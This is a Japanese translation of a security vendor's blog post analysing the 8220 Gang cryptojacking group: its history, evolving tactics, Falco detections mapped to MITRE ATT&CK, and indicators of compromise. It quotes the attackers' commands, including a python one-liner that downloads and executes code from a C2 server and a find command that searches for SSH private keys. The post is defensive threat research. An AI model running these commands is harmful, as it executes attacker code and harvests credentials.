Google Cloudとコンテナの継続的なセキュリティ
本文の内容は、2023年2月14日にCRYSTAL MORIN が投稿したブログ(https://sysdig.com/blog/8220-gang-continues-to-evolve)を元に日本語に翻訳・再構成した内容となっております。
8220 Gangは、2017年にコマンド&コントロール(C2)ネットワーク通信のために8220ポートを最初に使用したため、このような残念な名前で呼ばれる低レベルスクリプトキディーのグループです。2018年後半の最初のTalosレポート以来、このグループは、クリプトジャッキングの世界でグループ内で協力し合い、学習し、利益を得続けてきました。このグループは、検知を避けるため、あるいはキャンペーンごとに学習して改善を続けているため、戦術、技術、手順(TTP)を定期的に変えていることで、かなりよく知られています。
このブログでは、Sysdigの脅威リサーチチームが捉えた最近の8220 Gangの攻撃をいくつか紹介します。彼らが現在、どの相手からツールを盗んでいるのか、また、新しく改良されたテクニックに注目します。いつものように、indicators of compromise (IoC) のリストは、ブログの最後に掲載されています。
8220 Gangは、他のグループの戦術やテクニックを使用することでよく知られています。その理由としては、盗むのが簡単で、独自のツールを作成するほど洗練されていない、または帰属を隠そうとしているのではないかいうものがあります。オッカムのカミソリは、それが前者であることを指し示しています。(*日本では馴染みの無い表現ですが原文になるべく忠実に翻訳しています)
8220 Gangは、TeamTNTとRocke Groupのスクリプトとマイナー、およびWatchDogドメインのネーミングスタイルを借用していることが、以前報告されています。
Cisco Talosは2018年12月に8220 Gangについて初めて報告し、同グループの初期の取り組みについて、Struts2、Redis、Weblogicの悪用、whatMinerの使用、悪意のあるDockerイメージの使用などの時系列と説明を示しました。クラウドセキュリティの専門家は、TeamTNTとして知られる脅威要因がこの時期に出現し、同じ脆弱性と設定ミスの多く、特に露出したDockerエンドポイントやRedisの脆弱なインスタンスを悪用したことを思い出すかもしれません。2021年半ば、Laceworkは、修正されたTsunamiベースのIRCボットネットと新しいローダスクリプトに加えて、PwnRigと呼ばれる8220 GangのXMRig亜種を特定しました。8220 GangがPwnRigを使用したことは、同グループがスクリプトではなく、コンパイルされたコードに変更を加えた最初の記録であることから、注目されています。8220 Gangは、PwnRigを作成する際にXMRigに変更を加え、IoCとして通常使用される設定ファイルやマイニングプールを難読化しました。
最近では、SentinelOneが2022年7月と10月に8220 Gangについて報告し、ボットネットとクリプトマイニングの配布を拡大させています。これらのキャンペーンでは、同グループは、設定ミスのある脆弱な一般向けホストを引き続き悪用しています。これらの報告では、PureCrypter Malware-as-a-Service ダウンローダーの使用、 89.34.27[.]167
と 79.110.62[.]23
,の間でのC2インフラの移行、マルウェアを隠すための Discord の使用、および jira?confluence という名前のシェルスクリプトによるリモートサーバからのコマンドのダウンロードなどの新しい TTP を報告しています。
2022年11月から2023年1月にかけて、私たちが最近観測した8220 Gangの攻撃は、以前に観測し詳述したものと多くの類似点があり、すなわち最終目的はクリプトジャッキングであることがわかります。このグループは、脆弱なアプリケーションを発見するために、masscanとspiritを使用してインターネットをスキャンし続けています。当然のことながら、私たちが捕捉した3件のうち2件は、悪用可能なOracle Weblogicアプリケーションに対するものでした。同様に、もう1つのキャンペーンは、脆弱性のあるApacheウェブサーバーを攻撃しています。このグループはまた、XMRigのPwnRigフォークをまだデプロイしており、パーシステンスをスケジュールするためにcronを使用しています。
何が変わったのか?1月のキャプチャーは、キャンペーンのメインC2 185[.]106[.]94[.]146
からダウンロードしたxmsというシェルスクリプトを使用しています。11月と1月のキャンペーンの主な違いは、新しい攻撃がより強固になっていることです。その一例は、wgetとcronのバックアップダウンロードツールとしてlwp-downloadが追加されたことです。もう一つは、永続化のためにinit.dサービスを作成することです。また、最新の攻撃では、自分自身を(再)インストールしようとする前に、アクティブなC2接続があるかどうかをチェックします。
8220 Gangは、その取り組みの初期段階において、C2インフラストラクチャーを再利用していました。現在では、このグループがC2 IPアドレスを一貫して変更するようにアップグレードしたことを確信を持って言えます。また、8220 Gangは、oanacronerスクリプトを初めて使用しましたが、これはRocke cryptomingグループで以前から報告されていたものです。11月から1月にかけて、ドメインとIPアドレスの両方がローテーションされました。
さらに1月には、8220 Gangはプライベートキーを見つけるための新しいディスカバリー戦術として、find /root/ /root /home -maxdepth 2 -name id_rsa*というコマンドを使用しました。また、このグループは、bash -shを使用して自分の手順を消去するなど、より多くの防御回避戦術を追加し、彼らのツールセットを収集するために以下のpythonスクリプトをbase64エンコードして導入しました:
python -c "import urllib; exec(urllib.urlopen("http[://]185.106.94.146/e.py").read())"
以下の表は、私たちが受け取った3つの8220 Gang 攻撃の間にトリガーされたMITRE ATT&CKに沿ったFalcoのルールを示しています。ネタバレ注意:3つのキャンペーンにまたがって多くの一貫性がありました 最初の表は、複数のキャンペーンでトリガーされたFalcoのルールを示しています。2つ目の表は、1度だけトリガーしたルールで、キャンペーン間の偏差を表しています。
一貫して使用されている8220 Gangのテクニック:
トリガーされたFalco ルール | MITRE ATT&CK 戦術 |
Execution from /tmp | Execution, Privilege escalation, Defense evasion |
Suspicious system service modification | Persistence, Privilege escalation, Defense evasion |
Modify ld.so.preload | Persistence, Privilege escalation, Defense evasion |
Suspicious cron modification | Persistence, Privilege escalation, Defense evasion |
Write below root | Persistence, Defense evasion |
Launch ingress remote file copy tools in container | Lateral movement |
Schedule cron jobs | Execution, Persistence, Privilege escalation |
Write below binary dir | Persistence, Defense evasion |
Read shell configuration file | Discovery |
Write below etc | Persistence, Defense evasion |
1月に観測された新しいテクニック:
トリガーされたFalco ルール | MITRE ATT&CK 戦術 |
Detect malicious cmdlines (use of lwp_download) | Execution, Persistence, Privilege escalation |
Search private keys or passwords | Discovery |
Clear log activities | Defense evasion |
Base64-encoded python script execution | Defense evasion |
8220 Gang は、クラウドの脅威の検知と対応において、依然として有名な存在です。しかし、彼らの活動は自然な形で進行しているため、このようなレッテルはいつの日か意味をなさなくなる可能性があります。クラウドを保護するためのベストプラクティスに従うことで、8220 Gangのような素朴でありながら発展途上のアクターから確実に保護することができます。
C2 IP Addresses
185.106.94[.]146
85.209.134[.]86
51.255.171[.]23
194.38.23[.]170
Filename | MD5 |
linux-d | 5cc46e42feea62c6fbe2d600dd5aab51 |
oanacroner | 0621ed468aa68a2b46391e3455a049ec |
ircd | 63a86932a5bad5da32ebd1689aa814b3 |
initdr | 915aec68a5b53aa7681a461a122594d9 |
sysdown | 90df9de121f55f1d01b370f362d13aca |
apache | 1bb8edf3ed8693df62bcbfe2fe05dadd |
xms | 13fe53f6a2632f05c16da40de9bfc829 |
.bashrc | 92c3c4f1c5fb684a1f92cd1ddeb1d9fb |
.ntpdate | 26803695b83b5e39290d654fcd28774a |
pwnrig | 6b2b76ffa0926f049dfa28cf03bd8e40 |
xms | 13fe53f6a2632f05c16da40de9bfc829 |
bashirc.x86_64 | 63a86932a5bad5da32ebd1689aa814b3 |
spirit | 09c305e3e06bf1a54d28f16a2b38c979 |
initdr | 0ffa42915a8182dca447772138ef4510 |
bashirc | 63a86932a5bad5da32ebd1689aa814b3 |
.tmpest | a4c97040c898e2ad416d1ddef826491d |
masscan | eefc0ce93d254982fbbcd26460f3d10d |
jira?confluence | a4c97040c898e2ad416d1ddef826491d |